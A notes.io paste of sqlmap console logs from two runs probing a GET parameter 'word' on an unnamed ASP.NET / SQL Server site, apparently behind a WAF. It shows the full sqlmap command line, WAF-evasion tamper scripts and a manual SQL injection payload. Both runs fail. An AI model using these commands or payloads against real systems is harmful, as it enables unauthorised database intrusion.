Notes
Notes - notes.io |
___
__H__
___ ___[.]_____ ___ ___ {1.3.10.27#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:41:45 /2019-11-06/
[13:41:45] [INFO] parsing HTTP request from 'C:UsersAdministratorDesktop3.txt'
[13:41:47] [INFO] loading tamper module 'between'
[13:41:56] [INFO] loading tamper module 'charencode'
[13:42:05] [INFO] loading tamper module 'charunicodeencode'
[13:42:06] [WARNING] tamper script 'charunicodeencode' is only meant to be run against ASP or ASP.NET web applications
[13:42:09] [INFO] loading tamper module 'equaltolike'
[13:42:09] [WARNING] tamper script 'equaltolike' is unlikely to work against PostgreSQL
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] y
[13:42:13] [WARNING] using too many tamper scripts is usually not a good idea
[13:42:17] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:14.0) Gecko/20120405 Firefox/14.0a1' from file 'C:qdatatxtuser-agents.txt'
[13:42:26] [WARNING] it appears that you have provided tainted parameter values ('word='AND 1%3dcast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'%3d'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
it appears that provided value for GET parameter 'word' has boundaries. Do you want to inject inside? (''AND 1%3dcast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'%3d*'') [y/N] y
[13:42:33] [INFO] flushing session file
[13:42:33] [INFO] testing connection to the target URL
[13:42:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:42:38] [CRITICAL] WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)'
are you sure that you want to continue with further target testing? [Y/n] y
[13:42:43] [INFO] testing if the target URL content is stable
[13:42:44] [INFO] target URL content is stable
[13:42:44] [WARNING] heuristic (basic) test shows that GET parameter 'word' might not be injectable
[13:42:44] [INFO] heuristic (XSS) test shows that GET parameter 'word' might be vulnerable to cross-site scripting (XSS) attacks
[13:42:44] [INFO] testing for SQL injection on GET parameter 'word'
[13:42:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:42:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[13:43:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[13:43:06] [WARNING] GET parameter 'word' does not seem to be injectable
[13:43:06] [CRITICAL] all tested parameters do not appear to be injectable
[13:43:06] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[*] ending @ 13:43:06 /2019-11-06/
C:q>sqlmap.py -r "C:UsersAdministratorDesktop3.txt" -p "word" --risk="3" --level="5" --test-filter="AND boolean-based blind - WHERE or HAVING clause" --dbms="Microsoft SQL Server" --dbs --flush-session --random-agent
___
__H__
___ ___[']_____ ___ ___ {1.3.10.27#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:12:22 /2019-11-06/
[14:12:22] [INFO] parsing HTTP request from 'C:UsersAdministratorDesktop3.txt'
[14:12:22] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Firefox/2.0.0.12 (Debian-2.0.0.12-0etch1)' from file 'C:qdatatxtuser-agents.txt'
[14:12:28] [WARNING] it appears that you have provided tainted parameter values ('word='AND 1%3dcast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'%3d'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
it appears that provided value for GET parameter 'word' has boundaries. Do you want to inject inside? (''AND 1%3dcast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'%3d*'') [y/N] y
[14:12:34] [INFO] flushing session file
[14:12:34] [INFO] testing connection to the target URL
[14:12:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:12:35] [CRITICAL] WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)'
are you sure that you want to continue with further target testing? [Y/n] y
[14:12:37] [WARNING] please consider usage of tamper scripts (option '--tamper')
[14:12:37] [INFO] testing if the target URL content is stable
[14:12:37] [INFO] target URL content is stable
[14:12:37] [WARNING] heuristic (basic) test shows that GET parameter 'word' might not be injectable
[14:12:37] [INFO] testing for SQL injection on GET parameter 'word'
[14:12:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:12:39] [WARNING] reflective value(s) found and filtering out
[14:12:39] [INFO] GET parameter 'word' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:12:41] [INFO] checking if the injection point on GET parameter 'word' is a false positive
[14:12:42] [WARNING] false positive or unexploitable injection point detected
[14:12:44] [WARNING] GET parameter 'word' does not seem to be injectable
[14:12:44] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[14:12:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[*] ending @ 14:12:44 /2019-11-06/
|
|
Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...
With notes.io;
- * You can take a note from anywhere and any device with internet connection.
- * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
- * You can quickly share your contents without website, blog and e-mail.
- * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
- * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.
Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.
Easy: Notes.io doesn’t require installation. Just write and share note!
Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )
Free: Notes.io works for 12 years and has been free since the day it was started.
You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;
Email: [email protected]
Twitter: http://twitter.com/notesio
Instagram: http://instagram.com/notes.io
Facebook: http://facebook.com/notesio
Regards;
Notes.io Team
